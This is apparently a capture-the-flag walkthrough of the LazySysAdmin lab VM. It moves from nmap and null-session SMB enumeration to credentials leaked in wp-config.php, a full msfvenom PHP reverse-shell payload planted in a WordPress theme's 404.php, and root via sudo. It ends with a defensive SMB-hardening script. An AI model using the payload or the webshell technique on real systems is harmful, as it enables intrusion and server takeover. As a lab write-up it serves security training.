Tools

Target machine
kali linux

Procedure

SMB introduction
SMB (Server Message Block) is a communication protocol defined by Microsoft and Intel in 1987, mainly as the communication protocol for Microsoft networks. Linux later ported SMB under the name Samba.

SMB runs over TCP/NetBIOS and normally uses ports 139 and 445.

With SMB, a computer can access network resources and download the corresponding files.

IP scan

netdiscover -r 192.168.2.1/24

Result:

Target IP: 192.168.2.140

Information gathering

Probe open services

root@kali:~# nmap -sV 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:46 EDT
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.0016s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds

Probe all information
Note: -T4 means 4 processes

root@kali:~# nmap -A -v -T4 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:47 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating ARP Ping Scan at 10:47
Scanning 192.168.2.140 [1 port]
Completed ARP Ping Scan at 10:47, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:47
Completed Parallel DNS resolution of 1 host. at 10:47, 0.00s elapsed
Initiating SYN Stealth Scan at 10:47
Scanning LazySysAdmin.lan (192.168.2.140) [1000 ports]
Discovered open port 3306/tcp on 192.168.2.140
Discovered open port 80/tcp on 192.168.2.140
Discovered open port 139/tcp on 192.168.2.140
Discovered open port 22/tcp on 192.168.2.140
Discovered open port 445/tcp on 192.168.2.140
Discovered open port 6667/tcp on 192.168.2.140
Completed SYN Stealth Scan at 10:47, 0.22s elapsed (1000 total ports)
Initiating Service scan at 10:47
Scanning 6 services on LazySysAdmin.lan (192.168.2.140)
Completed Service scan at 10:47, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against LazySysAdmin.lan (192.168.2.140)
NSE: Script scanning 192.168.2.140.
Initiating NSE at 10:47
Completed NSE at 10:47, 10.18s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.00090s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.2.165
|_  error: Closing link: (nmap@192.168.2.165) [Client exited]
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.004 days (since Sat Aug 17 10:41:48 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h19m59s, deviation: 5h46m24s, median: 0s
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   LAZYSYSADMIN<00>     Flags: <unique><active>
|   LAZYSYSADMIN<03>     Flags: <unique><active>
|   LAZYSYSADMIN<20>     Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-08-18T00:47:39+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-17 10:47:39
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.90 ms LazySysAdmin.lan (192.168.2.140)

NSE: Script Post-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.91 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.302KB)

First we open the website to look for information.
After browsing around, nothing useful was found.

Next we start analysing the open services. We found that ports 22, 139, 445, 3306, 80 and 6667 are open.

We start with the ports above 1024.

Enter http://192.168.2.140:6667/ in Firefox to open the page.
Result: no information at all. Next we try analysing the other services.

Weakness analysis for the SMB protocol

1. For SMB, try logging in with a null or weak password, then look for sensitive files and download them for review:

smbclient -L IP              # list the SMB shares
smbclient '\\IP\$share'      # browse an SMB share
get sensitive_file           # download a file

2. Analyse SMB remote overflow vulnerabilities:

searchsploit samba <version>   # search for SMB remote overflow exploits

First we list the SMB shares.

root@kali:~# smbclient -L 192.168.2.140
Enter WORKGROUP\root's password: 

It prompts for a password; we try logging in with an empty password.

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            

Login succeeded; next we probe deeper.
We enter the print$ share.

Login fails. We enter the share$ share.
Login succeeds; let's look at the directory.

We leave share$ and look at the IPC$ share.

Login succeeds, but it contains nothing, so we go back into share$ to look for sensitive information.
We download deets.txt, robots.txt and todolist.txt, then enter the wordpress folder to look at its contents.

smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \> get robots.txt
getting file \robots.txt of size 92 as robots.txt (18.0 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (15.4 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> cd wordpress
smb: \wordpress\> ls
  .                                   D        0  Sat Aug 17 06:35:47 2019
  ..                                  D        0  Tue Aug 15 07:05:52 2017
  wp-config-sample.php                N     2853  Wed Dec 16 04:58:26 2015
  wp-trackback.php                    N     4513  Fri Oct 14 15:39:28 2016
  wp-admin                            D        0  Wed Aug  2 17:02:02 2017
  wp-settings.php                     N    16200  Thu Apr  6 14:01:42 2017
  wp-blog-header.php                  N      364  Sat Dec 19 06:20:28 2015
  index.php                           N      418  Tue Sep 24 20:18:11 2013
  wp-cron.php                         N     3286  Sun May 24 13:26:25 2015
  wp-links-opml.php                   N     2422  Sun Nov 20 21:46:30 2016
  readme.html                         N     7413  Sat Aug 17 06:35:47 2019
  wp-signup.php                       N    29924  Tue Jan 24 06:08:42 2017
  wp-content                          D        0  Sat Aug 17 06:52:24 2019
  license.txt                         N    19935  Sat Aug 17 06:35:47 2019
  wp-mail.php                         N     8048  Wed Jan 11 00:13:43 2017
  wp-activate.php                     N     6864  Sat Aug 17 06:35:47 2019
  .htaccess                           H       35  Tue Aug 15 07:40:13 2017
  xmlrpc.php                          N     3065  Wed Aug 31 12:31:29 2016
  wp-login.php                        N    34347  Sat Aug 17 06:35:47 2019
  wp-load.php                         N     3301  Mon Oct 24 23:15:30 2016
  wp-comments-post.php                N     1627  Mon Aug 29 08:00:32 2016
  wp-config.php                       N     3703  Mon Aug 21 05:25:14 2017
  wp-includes                         D        0  Wed Aug  2 17:02:03 2017

		3029776 blocks of size 1024. 1452424 blocks available
smb: \wordpress\> 

We found the wp-config.php file, so we download it.

We look through the files one by one for anything useful.

root@kali:~# gedit wp-config.php


<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT',       'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

In deets.txt we found a password: 12345

In wp-config.php we found the MySQL username and password.

We also know the target has port 3306 open, so we try a remote connection.
We find that the server does not allow remote database connections.

Let's try a vulnerability search.

root@kali:~# searchsploit smbd 3.X - 4.X
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit smbd 4.3.11-Ubuntu
Exploits: No Result
Shellcodes: No Result

We found no vulnerabilities. Let's try an SSH connection.
The passwords entered are the one exposed in wp-config.php and the one exposed in deets.txt.

Admin@192.168.2.140's password: 
Permission denied, please try again.
Admin@192.168.2.140's password: 
Permission denied, please try again.

The result is still unsatisfying.
So we have no choice but to scan directories.

Weakness analysis for the HTTP protocol
1. Inspect the website in a browser
2. Probe with dirb and nikto
3. Find a way in: log in to the admin backend and upload a webshell

In the dirb scan we found a sensitive file.
Open the link.

We reach the site's backend login and enter the username and password exposed from the MySQL config.
We are now in the backend.
Creating the webshell
Method

msfvenom -p php/meterpreter/reverse_tcp lhost=kali_ip lport=4444 -f raw
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.165 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.2.165'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

We strip the comment wrapper from the generated source and paste it into a file to create the webshell.

Start the listener
Start metasploit
Then start the listener

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.2.140
lhost => 192.168.2.140
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.140    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[-] Handler failed to bind to 192.168.2.140:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 

Now Kali is listening on port 4444 for the target's connection.

Next, we upload the webshell.

Upload the webshell

Use the sensitive information found to log in to the admin backend and upload the webshell. Execute the webshell (visit the PHP page that contains it).

Get the reverse shell
WordPress upload point: theme 404.php
Execute: http://ip_address/wordpress/wp-content/themes/twentyfifteen/404.php (explained below)

We open Firefox and enter the backend.

Click the menu entry shown in the original screenshot, then click Editor.

The page looks like this:
Click 404 Template on the side, paste the source code in, and click the Update File button.

After clicking, the following result appears:
Edit successful. Next we trigger the webshell.

Enter http://192.168.2.140/wordpress/wp-content/themes/twentyfifteen/404.php; we see a reaction on the msf side.
We check the current user.
We find the terminal does not recognise id, so we use shell.
After entering the shell, we first look at the current directory.

meterpreter > shell
Process 1521 created.
Channel 0 created.
ls
404.php
archive.php
author-bio.php
comments.php
content-link.php
content-none.php
content-page.php
content-search.php
content.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
page.php
readme.txt
rtl.css
screenshot.png
search.php
sidebar.php
single.php
style.css

We upgrade the shell to a proper terminal.
We look at the user information.
We find a user in /home.
We switch to that user.
A password is required; we can try the password from deets.txt.

Logged in successfully.

Now we look at the directory.
We find the cd command is restricted.

Let's try switching to root.

First we list the togie user's privileges.

sudo -l
togie@LazySysAdmin:/var/www/html/wordpress/wp-content/themes/twentyfifteen$ sudo -l
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL

-l, --list    list the user's privileges or check a specific command; use twice for the long format

We find this user can switch to root.
Switch succeeded; next we look for the flag.

root@LazySysAdmin:~# ls
ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

(By rights, proof.txt should be the flag; I am a bit embarrassed too.)

Summary

For machines with ports 139 and 445 open, always check whether smbclient can log in to the shared directories directly and look for sensitive files.

Usually the flag is in /root and root privileges are needed to read it.
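The check the summary recommends, turned into a small defender's script. This is an added example, my own code rather than anything from the original post or the LazySysAdmin box: it parses the nmap smb-security-mode / smb2-security-mode output, the smbclient -L share table and the wordpress directory listing shown above (sample inputs constructed from this page) and returns a fix list; the Samba option names are real, the fix wording is my recommendation.

```python
"""Added triage helper, not from the original walkthrough: it reads the
nmap smb-security-mode / smb2-security-mode output, the smbclient -L
share table and an smbclient 'ls' listing, and returns the weaknesses a
defender should fix on a host like this one, with the Samba setting that
closes each."""
import re

# Sample inputs constructed from the output shown on this page.
NSE_SMB = """\
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""
SHARES = """\
\tSharename       Type      Comment
\t---------       ----      -------
\tprint$          Disk      Printer Drivers
\tshare$          Disk      Sumshare
\tIPC$            IPC       IPC Service (Web server)
"""
LISTING = """\
  wp-config-sample.php                N     2853  Wed Dec 16 04:58:26 2015
  wp-config.php                       N     3703  Mon Aug 21 05:25:14 2017
  .htaccess                           H       35  Tue Aug 15 07:40:13 2017
"""
# Files holding credentials or secrets that must never sit on a readable share.
SENSITIVE = {"wp-config.php", ".htaccess", "deets.txt", "todolist.txt"}

def smb_findings(nse_block):
    """Map nmap smb-* script lines to (finding, fix) pairs."""
    text = nse_block.lower()
    checks = [
        (r"account_used:\s*guest", "guest/null session accepted",
         "smb.conf: 'map to guest = Never' and 'guest ok = no' on each share"),
        (r"message_signing:\s*disabled", "SMB1 signing disabled",
         "smb.conf: 'server signing = mandatory', 'server min protocol = SMB2'"),
        (r"signing enabled but not required", "SMB2 signing optional",
         "smb.conf: 'server signing = mandatory'"),
    ]
    return [(f, fix) for pat, f, fix in checks if re.search(pat, text)]

def disk_shares(share_table):
    """Disk shares from 'smbclient -L'; each needs a valid users / guest review."""
    rows = [line.split() for line in share_table.splitlines()]
    return [r[0] for r in rows if len(r) > 1 and r[1] == "Disk"]

def exposed_secrets(ls_output):
    """Sensitive filenames present in an smbclient 'ls' listing."""
    names = [line.split()[0] for line in ls_output.splitlines() if line.strip()]
    return sorted(n for n in names if n in SENSITIVE)
```

Feed the three functions the real nmap and smbclient output captured from your own hosts; an empty result from all three is the state a hardened Samba server should report.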
